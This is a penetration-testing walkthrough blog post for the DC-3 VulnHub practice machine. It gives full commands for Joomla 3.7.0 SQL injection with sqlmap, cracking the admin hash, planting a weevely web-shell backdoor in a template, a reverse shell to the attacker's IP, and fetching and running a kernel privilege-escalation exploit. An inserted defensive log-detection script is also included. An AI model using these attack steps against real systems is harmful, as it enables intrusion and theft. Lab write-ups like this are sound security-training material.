DC-3 Target Machine Walkthrough

Target machine location

https://www.vulnhub.com/entry/dc-3,312/
DC-3-2.zip (Size: 1005 MB)
Download: http://www.five86.com/downloads/DC-3-2.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-3-2.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-3-2.zip.torrent

Target machine description

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).

If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Information gathering

Attacker address: 192.168.0.107
Target address: 192.168.0.106
Run a full port scan with Nmap:
nmap -A -p- 192.168.0.106
Port 80 is open, and browsing to it shows a Joomla site.


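First enumerate directories to see what is exposed. Apart from the administrator back end, nothing useful turns up.

Scan the site with joomscan:
joomscan --url http://192.168.0.106
It reports the current version as 3.7.0.

Look this version up; this Joomla release has an SQL injection vulnerability:
searchsploit joomla 3.7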

Exploitation and privilege escalation

Vulnerability details: https://www.exploit-db.com/exploits/42033
Run sqlmap against it directly:
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dbs
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables
sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T "#__users" --columns --dump
This yields the admin account and its password hash; the next step is to crack the hash.
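
For the defender's side of the injection above, the following added example (not part of the original post) flags access-log requests to com_fields whose list[fullordering] value is not a plain ordering expression. The log lines are constructed, and the allow-list pattern for legitimate ordering values is an assumption.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate ordering value is a column name, optionally followed by ASC/DESC.
SAFE_ORDER = re.compile(r"^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$", re.IGNORECASE)
# Apache/nginx "combined" format: client IP, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_fullordering(line):
    """Return a finding dict for a com_fields request with a non-ordering value, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    # parse_qs decodes both keys and values, so list%5Bfullordering%5D is caught too.
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if query.get("option") != ["com_fields"]:
        return None
    bad = [v for v in query.get("list[fullordering]", []) if v and not SAFE_ORDER.match(v)]
    if not bad:
        return None
    return {"ip": m["ip"], "status": int(m["status"]), "value": bad[0]}

def count_by_source(lines):
    """Count flagged requests per client IP, to spot automated probing."""
    hits = (suspicious_fullordering(line) for line in lines)
    return dict(Counter(h["ip"] for h in hits if h))

# Constructed sample log lines (not taken from the target machine).
SAMPLE = [
    '192.168.0.50 - - [05/May/2021:01:00:00 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=a.title%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.0.107 - - [05/May/2021:01:00:05 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list%5Bfullordering%5D=a.title%2C%28SELECT%201%29 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    '192.168.0.107 - - [05/May/2021:01:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=1 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        finding = suspicious_fullordering(entry)
        if finding:
            print(finding)
    print(count_by_source(SAMPLE))
```

A burst of flagged requests from one source, especially with 500 responses, is the pattern an automated injection run leaves in the log.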

Write the hash to hash1.txt:
echo "\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu" > hash1.txt
Crack it with john, which recovers the password snoopy:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt ./hash1.txt

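Log in to the back end at http://192.168.0.106/administrator/ with the recovered credentials admin/snoopy, then find a template and edit one of its files to get a reverse shell.

Here I use Weevely to generate the backdoor:
weevely generate test test.php
(For usage details see https://blog.csdn.net/qq_45521281/article/details/106587791)

Insert the code into index.php of the beez3 template, save, and preview to get the URL: http://192.168.0.106/index.php?tp=1&templateStyle=4

Connect with weevely:
weevely "http://192.168.0.106/index.php?tp=1&templateStyle=4" test
The session runs with www-data privileges.

Next, get a shell back. On the attacker machine, start a listener with nc:
nc -lvp 7777
In weevely, run the following to send the shell back:
backdoor_reversetcp 192.168.0.107 7777
Then switch to an interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Check the current system version, then see whether it has any privilege escalation vulnerabilities:
searchsploit -w Ubuntu 16.04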


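There are actually quite a few privilege escalation vulnerabilities, but the target is a 32-bit system, so pick one that fits. We try this one: https://www.exploit-db.com/exploits/39772
Download 39772.zip as described there. A direct download is refused, so the hosts file has to be configured (add 151.101.76.133 raw.githubusercontent.com).

After downloading it locally, start an HTTP server:
python -m SimpleHTTPServer 8090
On the target, change to the tmp directory and fetch the file:
wget "http://192.168.0.107:8090/39772.zip"
Then extract the files, compile and run: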
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
the-flag.txt is found in the /root directory.

posted @ 2021-05-05 01:22  shadow-ink